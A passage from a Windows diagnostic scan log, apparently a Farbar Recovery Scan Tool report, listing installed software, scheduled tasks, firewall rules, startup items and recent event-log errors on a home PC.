Skype Click to Call (HKLM-x32\...\{B6CF2967-C81E-40C0-9815-C05774FEF120}) (Version: 5.6.8442 - Skype Technologies S.A.)
Smart PDF Creator 6.3.0.467 (HKLM\...\Smart PDF Creator_is1) (Version: 6.3.0.467 - Smart Soft)
Spotify (HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\...\Spotify) (Version: 0.9.14.13.gba5645ad - Spotify AB)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.0.20.0 - Synaptics Incorporated)
TeamViewer 9 (HKLM-x32\...\TeamViewer 9) (Version: 9.0.41110 - TeamViewer)
Tweaking.com - Windows Repair (All in One) (HKLM-x32\...\Tweaking.com - Windows Repair (All in One)) (Version: 2.7.5 - Tweaking.com)
VC80CRTRedist - 8.0.50727.6195 (x32 Version: 1.2.0 - DivX, Inc) Hidden
VLC (HKLM-x32\...\{D95CD7BE-A894-4F6C-B9DF-578C3CB411D4}) (Version: 1.0.0.0 - VLC)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
WIDCOMM Bluetooth Software (HKLM\...\{9E9D49A4-1DF4-4138-B7DB-5D87A893088E}) (Version: 6.2.1.1100 - Broadcom Corporation)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WSOP.com (HKLM-x32\...\WSOP.com) (Version:  - )
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Owner\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Owner\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Owner\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Owner\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Owner\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Owner\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Owner\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Owner\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\Owner\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Owner\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Owner\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Owner\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Owner\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Owner\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Owner\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Owner\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll => No File
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {005D5A9C-74C2-4FD6-8073-9D4E616FD2AF} - System32\Tasks\{DAE0D78C-0F16-47AB-8FE2-8DF6AE5FC476} => pcalua.exe -a C:\Windows\SysWOW64\Samsung_USB_Drivers\1\SS_Uninstall.exe
Task: {02104905-B821-471C-82CB-CF9C54E9EC7F} - System32\Tasks\{76D83EEC-C3B5-4377-B315-ED45F9C7F6F1} => pcalua.exe -a "C:\users\public\documents\amazon games &amp; software\sims3ambitions\Sims3EP02Setup.exe" -d "C:\Program Files (x86)\Amazon\Amazon Games &amp; Software Downloader"
Task: {100CD708-8462-4CD9-99AE-142B67654E51} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2923065098-2265594029-2962721977-1000Core => C:\Users\Owner\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {17F01972-BA25-4761-96F4-D0833EF5A9AE} - System32\Tasks\{A2BA4E4F-5931-41BF-9129-D1AA77CB3D19} => C:\Program Files (x86)\Skype\\Phone\Skype.exe
Task: {1AE40F06-3261-49FE-B142-0DB788BA3AF5} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-13] (Adobe Systems Incorporated)
Task: {23BD1189-E5FC-40C5-87E4-992692AD9BE9} - System32\Tasks\Java Update Scheduler => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2015-12-22] (Oracle Corporation)
Task: {2CFDF33C-3172-4054-A770-A654AC02A50A} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-27] (Adobe Systems Incorporated)
Task: {2FFBA451-80C3-49A0-9C66-081AF4031F05} - System32\Tasks\{67FF8866-5FA5-4D79-A5F9-76E030F336BF} => pcalua.exe -a C:\Windows\SysWOW64\Samsung_USB_Drivers\3\SSCDUninstall.exe
Task: {344A6E41-9863-4557-B2C9-9A2B8933A068} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2923065098-2265594029-2962721977-1000UA => C:\Users\Owner\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {53E6E94E-3556-42EA-B90B-7CF0F9AEBBE1} - System32\Tasks\{79D9C216-AD1A-41CD-9445-8CB63E88D743} => C:\Program Files (x86)\Full Tilt Poker\FullTiltPoker.exe
Task: {5A40E926-9E86-4B89-9CFD-B12311724371} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {6877E746-41E5-45F7-8676-3E98814FDCEF} - \{BFAD41C2-E97A-4707-860A-5AB2C7A44E25} -> No File <==== ATTENTION
Task: {8742BF0B-8010-480C-8662-0674C84A5FA4} - System32\Tasks\HP online update program => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [2010-06-09] (Hewlett-Packard)
Task: {8A887B1A-A561-4826-BA4A-7FBF03399217} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {93AF7C17-D920-4F91-949E-594605729B2D} - \{170FABC1-475D-499D-BDAD-325B117E8ECE} -> No File <==== ATTENTION
Task: {99188BFA-E9A8-49CE-ABA5-058C9AFBC133} - System32\Tasks\{03C38E8B-68B6-4524-A8E5-7DC21627D59E} => pcalua.exe -a D:\setup.exe -d D:\
Task: {A83FDA4C-0CAD-479F-A0CB-2BD27F980F21} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2016-01-13] (AVAST Software)
Task: {B50AAD07-619B-454F-935D-4DA7DEE0075E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {C6DDB498-68AD-4E2D-A097-CBFF5D5CD32D} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-01-27] (AVAST Software)
Task: {DB7F7464-C8CB-4F04-8F8A-50DC96504A21} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {DD9F510C-95F4-499A-90C8-BAC5BC372FF4} - System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask => start sppsvc
Task: {F5F20B76-00AE-45F6-86F7-BFFCA8F46098} - System32\Tasks\HPCustParticipation HP Deskjet 1000 J110 series => C:\Program Files\HP\HP Deskjet 1000 J110 series\Bin\HPCustPartic.exe [2010-11-16] (Hewlett-Packard Co.)
Task: {F905FA34-0FA1-4051-8638-0021C6802A78} - System32\Tasks\PhotoProduct.exe => C:\Program Files (x86)\HP Photo Creations\PhotoProduct.exe [2010-07-01] (Visan / RocketLife)
Task: {FB5891B8-8E67-461D-894C-B8CEA506317C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {FE00498E-9BD1-4565-B539-D767060F34BD} - System32\Tasks\Google Updater and Installer => C:\Users\Owner\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {FE83669D-364D-465F-A269-623CD57CEE1E} - System32\Tasks\Adobe online update program => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-13] (Adobe Systems Incorporated)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2923065098-2265594029-2962721977-1000Core.job => C:\Users\Owner\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2923065098-2265594029-2962721977-1000UA.job => C:\Users\Owner\AppData\Local\Google\Update\GoogleUpdate.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
==================== Loaded Modules (Whitelisted) ==============
 
2010-03-05 07:21 - 2010-03-05 07:21 - 01501696 _____ () C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll
2011-01-17 02:38 - 2010-08-11 16:19 - 00781536 _____ () C:\Program Files (x86)\Dell DataSafe Local Backup\Components\Scheduler\STService.exe
2010-03-05 07:21 - 2010-03-05 07:21 - 01501696 _____ () C:\Program Files\Common Files\Intel\WirelessCommon\LIBEAY32.dll
2016-01-13 03:00 - 2016-01-13 03:00 - 00103888 _____ () C:\Program Files\AVAST Software\Avast\log.dll
2016-01-13 03:00 - 2016-01-13 03:00 - 00125512 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2016-02-05 18:44 - 2016-02-05 18:44 - 02819072 _____ () C:\Program Files\AVAST Software\Avast\defs\16020501\algo.dll
2016-01-13 03:00 - 2016-01-13 03:00 - 00469008 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2016-02-10 02:09 - 2016-02-10 02:09 - 02820096 _____ () C:\Program Files\AVAST Software\Avast\defs\16020902\algo.dll
2011-01-17 02:37 - 2010-08-11 16:19 - 00126176 _____ () C:\Program Files (x86)\Dell DataSafe Local Backup\STLog.dll
2011-01-17 02:37 - 2010-08-11 16:19 - 01121504 _____ () C:\Program Files (x86)\Dell DataSafe Local Backup\LibXml2.dll
2011-01-17 02:37 - 2010-08-11 16:19 - 00077024 _____ () C:\Program Files (x86)\Dell DataSafe Local Backup\zlib1.dll
2011-01-17 02:37 - 2010-08-11 16:19 - 00232672 _____ () C:\Program Files (x86)\Dell DataSafe Local Backup\STFiles.dll
2011-01-17 02:37 - 2010-08-11 16:19 - 00072928 _____ () C:\Program Files (x86)\Dell DataSafe Local Backup\STRegistry.dll
2011-01-17 02:37 - 2010-08-11 16:19 - 00109792 _____ () C:\Program Files (x86)\Dell DataSafe Local Backup\STPE.dll
2011-01-17 02:37 - 2010-08-11 16:19 - 00119008 _____ () C:\Program Files (x86)\Dell DataSafe Local Backup\STNLS.dll
2016-01-13 03:00 - 2016-01-13 03:01 - 40539648 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2016-02-04 15:26 - 2016-02-02 23:27 - 01632584 _____ () C:\Users\Owner\AppData\Local\Google\Chrome\Application\48.0.2564.103\libglesv2.dll
2016-02-04 15:26 - 2016-02-02 23:27 - 00087880 _____ () C:\Users\Owner\AppData\Local\Google\Chrome\Application\48.0.2564.103\libegl.dll
2016-02-04 15:26 - 2016-02-02 23:27 - 16799048 _____ () C:\Users\Owner\AppData\Local\Google\Chrome\Application\48.0.2564.103\PepperFlash\pepflashplayer.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 18:34 - 2014-06-12 20:01 - 00000855 ____A C:\Windows\system32\Drivers\etc\hosts
 
127.0.0.1       localhost
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 68.105.28.11 - 68.105.29.11
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\Services: SftService => 2
MSCONFIG\Services: YahooAUService => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Bluetooth.lnk => C:\Windows\pss\Bluetooth.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk => C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Owner^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dell Dock.lnk => C:\Windows\pss\Dell Dock.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Owner^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^MP3 Rocket (Minimized).lnk => C:\Windows\pss\MP3 Rocket (Minimized).lnk.Startup
MSCONFIG\startupreg: Adobe Reader Speed Launcher => "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe"
MSCONFIG\startupreg: AmazonGSDownloaderTray => C:\Program Files (x86)\Amazon\Amazon Games & Software Downloader\AmazonGSDownloaderTray.exe
MSCONFIG\startupreg: AppleSyncNotifier => C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: Dell Registration => C:\Program Files (x86)\System Registration\prodreg.exe /boot
MSCONFIG\startupreg: Dell Webcam Central => "C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe" /mode2
MSCONFIG\startupreg: Desktop Disc Tool => "C:\Program Files (x86)\Roxio\Roxio Burn\RoxioBurnLauncher.exe"
MSCONFIG\startupreg: Facebook Update => "C:\Users\Owner\AppData\Local\Facebook\Update\FacebookUpdate.exe" /c /nocrashserver
MSCONFIG\startupreg: Google Update => "C:\Users\Owner\AppData\Local\Google\Update\GoogleUpdate.exe" /c
MSCONFIG\startupreg: GoogleChromeAutoLaunch_721577D41E77D440C916E2687EBA0267 => "C:\Users\Owner\AppData\Local\Google\Chrome\Application\chrome.exe" --no-startup-window
MSCONFIG\startupreg: HP Officejet 6700 (NET) => "C:\Program Files\HP\HP Officejet 6700\Bin\ScanToPCActivationApp.exe" -deviceID "CN27V7G1MT05RQ:NW" -scfn "HP Officejet 6700 (NET)" -AutoStart 1
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: QuickSet => C:\Program Files\Dell\QuickSet\QuickSet.exe
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
MSCONFIG\startupreg: SmartSoft PDF Printer Agent => "C:\Program Files\Smart PDF Creator\SmartSoft PDF Printer Agent.exe"
MSCONFIG\startupreg: Spotify Web Helper => "C:\Users\Owner\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: uTorrent => "C:\Users\Owner\AppData\Roaming\uTorrent\uTorrent.exe"
MSCONFIG\startupreg: vProt => "C:\Program Files (x86)\AVG SafeGuard toolbar\vprot.exe"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{D1469C99-06CD-41E7-93E3-D6230ADE51D6}] => (Allow) C:\Program Files\Intel\WiMAX\Bin\AppSrv.exe
FirewallRules: [{376EA922-246A-4ACF-B34F-3377636AE879}] => (Allow) C:\Program Files\Intel\WiMAX\Bin\AppSrv.exe
FirewallRules: [{2F939130-E0F2-42D7-8E10-15BA1BE93A73}] => (Allow) C:\Program Files\Intel\WiMAX\Bin\DMAgent.exe
FirewallRules: [{904B712F-6733-4E08-BEF2-1B2C75F786B6}] => (Allow) C:\Program Files\Intel\WiMAX\Bin\DMAgent.exe
FirewallRules: [TCP Query User{F4AF9C3B-304C-45A9-88B6-5C5AB27EA6AB}C:\program files (x86)\google\google earth\client\googleearth.exe] => (Allow) C:\program files (x86)\google\google earth\client\googleearth.exe
FirewallRules: [UDP Query User{78D6E7D5-2A76-406C-A684-88ED6C3863A2}C:\program files (x86)\google\google earth\client\googleearth.exe] => (Allow) C:\program files (x86)\google\google earth\client\googleearth.exe
FirewallRules: [TCP Query User{70154C57-BDC2-4045-A273-704297CC6811}C:\program files (x86)\motorola media link\lite\mml.exe] => (Allow) C:\program files (x86)\motorola media link\lite\mml.exe
FirewallRules: [UDP Query User{E89D650A-6FF8-48E9-ACC9-FFBC4B9BF794}C:\program files (x86)\motorola media link\lite\mml.exe] => (Allow) C:\program files (x86)\motorola media link\lite\mml.exe
FirewallRules: [{C3AD1E97-3486-4C3B-AE29-174F3B63CB8F}] => (Block) C:\program files (x86)\motorola media link\lite\mml.exe
FirewallRules: [{2F661096-F44E-47B5-9085-00781A4696C6}] => (Block) C:\program files (x86)\motorola media link\lite\mml.exe
FirewallRules: [TCP Query User{4E679776-8862-4BF6-941E-6EEA2DA3C429}C:\users\owner\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\owner\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{2D939611-4E02-47C0-B6B2-D9A9A95B4D0E}C:\users\owner\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\owner\appdata\roaming\spotify\spotify.exe
FirewallRules: [{B53338A5-21BF-4C92-81F3-35DD57A9EA6B}] => (Allow) C:\Program Files\HP\HP Deskjet 1000 J110 series\Bin\USBSetup.exe
FirewallRules: [{D63D55B9-42E3-4B83-A3AC-C629A321AABA}] => (Allow) C:\Program Files\HP\HP Deskjet 1000 J110 series\Bin\USBSetup.exe
FirewallRules: [{F3BA34EE-DE0C-4083-BD72-5A676A3CCB67}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [{AAADB98F-3FC8-4332-9167-C3B1638174B1}] => (Allow) C:\Users\Owner\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{6605640E-304F-4A60-BC20-9BA214105C17}] => (Allow) C:\Users\Owner\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{7E853F16-A245-4CA3-A699-B9537B1F2459}] => (Allow) C:\ProgramData\eSafe\eGdpSvc.exe
FirewallRules: [{28D63852-0C97-4126-98BD-E357CABBC7A2}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{59978A5F-2ACC-4AA1-AF7A-4E726A83DBAD}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{8AD4BFDA-2C2A-457B-A3B1-250B798DAD94}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{C34541BF-0C47-45CF-B520-B35A2BCA4EFB}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{81419722-598E-4CC2-9A89-41BF4C328F68}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{A3733319-485B-4AA9-B235-9ED5A5EBB423}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [TCP Query User{AF003353-8F9F-43EC-A52F-02E29E85DBF6}C:\users\owner\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\owner\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{7988492E-479B-4F47-B3C1-19F14C6332E7}C:\users\owner\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\owner\appdata\roaming\spotify\spotify.exe
FirewallRules: [{FA8C9D00-7BA8-4FE1-A676-F5FC1F40E26B}] => (Allow) C:\Program Files\HP\HP Officejet 6700\bin\FaxApplications.exe
FirewallRules: [{EB0A04A9-327F-4B09-BA1A-5711A8A574CE}] => (Allow) C:\Program Files\HP\HP Officejet 6700\bin\DigitalWizards.exe
FirewallRules: [{B96BFBD6-6C11-4D23-B12F-B1950DF30D26}] => (Allow) C:\Program Files\HP\HP Officejet 6700\bin\SendAFax.exe
FirewallRules: [{27D8399A-0BCC-4D10-8129-BBB2744CAFC3}] => (Allow) C:\Program Files\HP\HP Officejet 6700\Bin\DeviceSetup.exe
FirewallRules: [{80CD31A2-14E2-4F56-8906-00661ABB7DBC}] => (Allow) C:\Program Files\HP\HP Officejet 6700\Bin\HPNetworkCommunicator.exe
FirewallRules: [{9D3C7CF0-3C20-4376-AB6A-A1EC78CAA67B}] => (Allow) C:\Program Files\HP\HP Officejet 6700\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [{3DD5FAC3-1A27-4ABA-8ADC-E8E6FE36A465}] => (Allow) C:\Users\Owner\Downloads\uTorrent (1).exe
FirewallRules: [{8FE27B49-8C2D-4904-8A43-2DB3A99CAB9E}] => (Allow) C:\Users\Owner\Downloads\uTorrent (1).exe
FirewallRules: [{72C0B2B8-3FBF-4B3A-BE65-AC423D3204AC}] => (Allow) C:\Users\Owner\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{6D84FEE6-CA5D-4FCA-AE38-4C057D93647D}] => (Allow) C:\Users\Owner\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{C8F42224-6EB6-4DBF-801D-DECB671573F5}] => (Allow) C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
FirewallRules: [{65CE2F48-A423-4D91-B8BA-3234B2AC8DEC}] => (Allow) C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
FirewallRules: [{60B2CBC1-F872-4924-ABD3-40967B4566C1}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
FirewallRules: [{83BA3BFE-1FA7-484A-AA73-DF335CC179A5}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
FirewallRules: [{AD9B65C0-BF5D-4887-8C88-EA5A351A27C4}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
FirewallRules: [{151E746C-C59C-4EF2-AC35-B3F990477C01}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
FirewallRules: [{7B979C12-36C9-4199-9049-06B63C58E1DB}] => (Allow) C:\Users\Owner\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{1C1624E7-12B4-4115-BC6C-91FD3D500C2C}] => (Allow) C:\Users\Owner\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{DCDAB0E4-C78D-4FC9-A01E-53515655E398}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe
FirewallRules: [{53AF2C97-E579-4B87-9CAB-0E06CDBF77F3}] => (Allow) LPort=5432
FirewallRules: [{34D3187A-C8DD-4575-BC93-6CF0382FA863}] => (Allow) C:\Users\Owner\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{752DB8D7-71AB-4F49-8DDF-F84A1602CB81}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{36E267D1-1C45-4C6E-B380-37CF1AD5C6DF}] => (Allow) LPort=2869
FirewallRules: [{589C05E4-BE3E-43A5-AC89-0A670AF09EE9}] => (Allow) LPort=1900
FirewallRules: [{3FE8046A-BC82-43D0-853D-7CCDCDE26D7B}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{4992DDAF-529D-4A7E-9344-931285B54EE4}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
FirewallRules: [{5609821B-0A0D-495E-A2F6-558FD7E0EAEF}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
FirewallRules: [{D2E89D5A-BE8F-4ADD-B5AA-FC2C37ADB42D}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
FirewallRules: [{DA0B1CE0-C7EC-4BB2-9974-6ABE7F8ABDE2}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
 
==================== Restore Points =========================
 
02-02-2016 03:34:05 Windows Update
05-02-2016 18:52:54 Windows Update
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (02/05/2016 06:54:15 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
Error: Failed to make the SOAP Call HResult: 0x800c0005. Exception caught while trying to report the Update Event
 
Error: (02/04/2016 12:22:04 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
Error: Failed to make the SOAP Call HResult: 0x800c0005. Exception caught while trying to report the Update Event
 
Error: (02/04/2016 12:22:04 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: There are currently no active network connections. Background Intelligent Transfer Service (BITS) will try again when an adapter is connected.
 
Error: (02/03/2016 01:00:36 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program mshta.exe version 11.0.9600.16428 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 1ca8
 
Start Time: 01d15e60b7f002cb
 
Termination Time: 10
 
Application Path: C:\Windows\SysWOW64\mshta.exe
 
